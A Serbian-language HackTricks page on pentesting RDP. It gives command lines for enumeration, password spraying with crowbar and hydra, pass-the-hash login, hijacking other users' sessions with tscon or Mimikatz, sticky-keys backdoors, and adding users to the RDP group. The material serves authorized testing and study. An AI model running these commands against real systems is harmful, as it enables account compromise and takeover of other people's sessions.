hacktricks/network-services-pentesting/pentesting-rdp.md

9.3 KiB

3389 - Pentesting RDP

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Instantno dostupno podešavanje za procenu ranjivosti & testiranje proboja. Pokrenite kompletan pentest od bilo kog mesta sa 20+ alata i funkcija koje idu od izviđanja do izveštavanja. Mi ne zamenjujemo pentestere - mi razvijamo prilagođene alate, module za detekciju & eksploataciju kako bismo im vratili neko vreme da dublje kopaju, otvaraju školjke i zabavljaju se.

{% embed url="https://pentest-tools.com/" %}

Osnovne Informacije

Razvijen od strane Microsoft-a, Remote Desktop Protocol (RDP) je dizajniran da omogući grafičku interfejsnu vezu između računara preko mreže. Da bi se uspostavila takva veza, koristi se RDP klijentski softver od strane korisnika, dok je istovremeno potrebno da udaljeni računar radi RDP serverski softver. Ovaj setup omogućava besprekorno upravljanje i pristup desktop okruženju udaljenog računara, suštinski donoseći njegov interfejs na lokalni uređaj korisnika.

Podrazumevani port: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Enumeracija

Automatska

{% code overflow="wrap" %}

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

{% endcode %}

Proverava dostupnu enkripciju i ranjivost na DoS (bez izazivanja DoS-a na servisu) i dobija NTLM Windows informacije (verzije).

Brute force

Budite oprezni, možete zaključati naloge

Password Spraying

Budite oprezni, možete zaključati naloge

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Povežite se sa poznatim pristupnim podacima/hash-om

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

Provera poznatih podataka za prijavljivanje na RDP servise

rdp_check.py iz impacket-a vam omogućava da proverite da li su neki podaci za prijavljivanje validni za RDP servis:

rdp_check <domain>/<name>:<password>@<IP>

Trenutno dostupno podešavanje za procenu ranjivosti i testiranje proboja. Pokrenite pun pentest sa bilo kog mesta sa preko 20 alatki i funkcija koje idu od izviđanja do izveštavanja. Mi ne zamenjujemo pentestere - mi razvijamo prilagođene alatke, module za otkrivanje i eksploataciju kako bismo im vratili nešto vremena da dublje kopaju, otvaraju ljuske i zabavljaju se.

{% embed url="https://pentest-tools.com/" %}

Napadi

Krađa sesije

Sa SYSTEM dozvolama možete pristupiti bilo kojoj otvorenoj RDP sesiji bilo kog korisnika bez potrebe da znate šifru vlasnika.

Dobijanje otvorenih sesija:

query user

Pristup odabranoj sesiji

tscon <ID> /dest:<SESSIONNAME>

Sada ćete biti unutar odabrane RDP sesije i moraćete da se predstavite kao korisnik koristeći samo Windows alate i funkcije.

Važno: Kada pristupite aktivnoj RDP sesiji, isključićete korisnika koji je koristio sesiju.

Možete dobiti lozinke iz procesa ispisivanjem, ali ovaj metod je mnogo brži i omogućava vam da interagujete sa virtuelnim desktopom korisnika (lozinke u Notepadu bez čuvanja na disku, druge RDP sesije otvorene na drugim mašinama...)

Mimikatz

Takođe možete koristiti Mimikatz za ovo:

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

Sticky-keys & Utilman

Kombinovanjem ove tehnike sa stickykeys ili utilmanom moći ćete da pristupite administrativnom CMD-u i bilo kojoj RDP sesiji u bilo koje vreme

Možete pretražiti RDP-ove koji su već zaraženi jednom od ovih tehnika sa: https://github.com/linuz/Sticky-Keys-Slayer

RDP Injekcija Procesa

Ako se neko iz drugog domena ili sa većim privilegijama prijavi putem RDP-a na računar gde vi imate administratorske privilegije, možete ubaciti svoj beacon u njegov RDP sesijski proces i delovati kao on:

{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} rdp-sessions-abuse.md {% endcontent-ref %}

Dodavanje Korisnika u RDP grupu

net localgroup "Remote Desktop Users" UserLoginName /add

Automatski alati

AutoRDPwn je post-exploitation okvir kreiran u Powershell-u, prvenstveno dizajniran da automatizuje Shadow napad na Microsoft Windows računarima. Ova ranjivost (navedena kao funkcija od strane Microsoft-a) omogućava udaljenom napadaču da vidi desktop svog žrtve bez njegovog pristanka, čak i da ga kontroliše po potrebi, koristeći alate koji su inherentni samom operativnom sistemu.

  • EvilRDP
  • Kontrola miša i tastature na automatizovan način sa komandne linije
  • Kontrola clipboard-a na automatizovan način sa komandne linije
  • Pokretanje SOCKS proxy-ja sa klijenta koji usmerava mrežnu komunikaciju ka cilju preko RDP-a
  • Izvršavanje proizvoljnih SHELL i PowerShell komandi na cilju bez otpremanja fajlova
  • Otpremanje i preuzimanje fajlova sa/cilja čak i kada su transferi fajlova onemogućeni na cilju

HackTricks Automatske Komande

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.

https://book.hacktricks.xyz/pentesting/pentesting-rdp

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}

Odmah dostupno podešavanje za procenu ranjivosti i testiranje proboja. Pokrenite kompletan pentest od bilo kuda sa preko 20 alatki i funkcija koje idu od izviđanja do izveštavanja. Mi ne zamenjujemo pentestere - mi razvijamo prilagođene alatke, module za otkrivanje i eksploataciju kako bismo im vratili nešto vremena da dublje kopaju, otvaraju ljuske i zabavljaju se.

{% embed url="https://pentest-tools.com/" %}

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u: